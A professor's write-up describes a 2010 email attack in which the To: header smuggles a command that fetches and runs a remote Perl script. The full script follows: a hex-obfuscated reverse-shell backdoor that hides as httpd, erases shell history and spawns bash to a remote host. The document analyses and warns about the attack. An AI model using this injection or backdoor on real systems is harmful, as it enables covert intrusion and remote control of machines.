============================================================ Remote Attack Script uses hexadecimal obfuscation ============================================================ -Ian! D. Allen - idallen@idallen.ca - www.idallen.com On Sunday March 14, 2010 I saw this new attack in my root mailbox (five times) at home: --------------------------- From blue@dick.com Sun Mar 14 19:07:30 2010 To: "root+GET http://www.linux-echo.de/.x/p.txt ; perl p.txt" Received: from bluedick (mail.modaintl.com [68.236.170.186]) Sun, 14 Mar 2010 19:07:30 -0400 (EDT) --------------------------- The attacking email came from mail.modaintl.com, which is is a Verizon address that appears to be in New York City. The domain is registered to Moda International Marketing in PA, USA. The file being fetched is this Perl script: http://www.linux-echo.de/.x/p.txt Host linux-echo.de is registered to a "Melanie Pavic" in Schlangen-Oesterholz. If I fetch that p.txt file from www.linux-echo.de in Germany, I get the Perl script below that tries to set up a remote shell connection from my machine to Australia using Python. The script did not execute. The attack script uses hexadecimal obfuscation to hide the file name used, the IP address, and the port number so that they aren't visible as readable ASCII characters in the script. Can you decode the hexadecimal? --------------------------- $File="\x2f\x74\x6d\x70\x2f\x73\x65\x73\x73\x5f\x65\x30\x30\x64\x64\x34\x6c\x62\x6f\x32\x61\x64\x32\x37\x35\x38\x6e\x39\x66\x63\x36\x34\x31\x65\x34\x37\x63\x64\x37\x36\x78\x39"; $perm="\x32\x30\x33\x2e\x35\x39\x2e\x31\x32\x33\x2e\x31\x31\x34"; $port="\x38\x30"; $fake="/usr/sbin/httpd"; if ($ARGV[0]) { $perm=$ARGV[0]; } $proto = Getprotobyname('tcp') || die("[x] Error: Getprotobyname()\n\n"); Socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("[x] Error: Socket()\n"); if (!Connect(SERVER, Pack "SnA4x8", 2, $port, Inet_aton($perm))) { die("! NO.\n"); } if (!Fork( )) { $0=$fake."\0"x16;; Open(STDIN,">&SERVER"); Open(STDOUT,">&SERVER"); Open(STDERR,">&SERVER"); System("unset HISTFILE;unset HISTSIZE;unset HISTFILESIZE;HISTFILE=/dev/null;rm -rf /tmp/.bash_*"); System("echo;echo \"\e[1;29m\" Machine: `uname -a`"); System("echo \"\e[1;34m\""); System("echo -----------------------------------------------------------------------------------"); System("w"); System("echo -----------------------------------------------------------------------------------"); if (-f $File) { System("echo [x] xeQted ; cat $File"); } if ((-x "/usr/bin/wget") && (-e "/usr/bin/wget")) { System("echo -ne \"\e[05;32m[Wget: Yes]\e[00m\" "); } if ((-x "/usr/bin/curl") && (-e "/usr/bin/curl")) { System("echo -ne \"\e[05;32m[Curl: Yes]\e[00m\" "); } if ((-x "/usr/bin/fetch") && (-e "/usr/bin/fetch")) { System("echo -ne \"\e[05;32m[Fetch: Yes]\e[00m\" "); } if ((-x "/usr/bin/GET") && (-e "/usr/bin/GET")) { System("echo -ne \"\e[05;32m[GET: Yes]\e[00m\" "); } if ((-x "/usr/bin/lwp-download") && (-e "/usr/bin/lwp-download")) { System("echo -ne \"\e[05;32m[LWP: Yes]\e[00m\" "); } if ((-x "/usr/bin/lynx") && (-e "/usr/bin/lynx")) { System("echo -ne \"\e[05;32m[Lynx: Yes]\e[00m\";echo "); } if ((-x "/usr/bin/gcc") && (-e "/usr/bin/gcc")) { System("echo -ne \"\e[05;32m[GCC: Yes]\e[00m\" "); } if (-e "/etc/udev/udev.conf") { System("echo -ne \"\e[05;32m UDEV Detected.\e[00m\" "); } if ((-x "/usr/bin/suidperl") && (-e "/usr/bin/suidperl")) { System("echo -ne \"\e[05;32m SuidPerl Detected.\e[00m\" "); } System("echo \"\e[1;32m\";id"); System("echo;echo;echo + Opening /bin/bash complex shell..."); Open pySHELL, ">/tmp/shell.py" or die $!; print pySHELL 'import pty; pty.spawn(\'/bin/bash\')'; close pySHELL; System("python /tmp/shell.py"); System("echo ! /bin/bash failed."); System("echo + /bin/sh Shell Success full."); exec {'/bin/sh'} $fake . "\0" x4; unlink($File); exit(0); } print "+ oK.\n"; --------------------------- -- | Ian! D. Allen - idallen@idallen.ca - Ottawa, Ontario, Canada | Home Page: http://idallen.com/ Contact Improv: http://contactimprov.ca/ | College professor (Free/Libre GNU+Linux) at: http://teaching.idallen.com/ | Defend digital freedom: http://eff.org/ and have fun: http://fools.ca/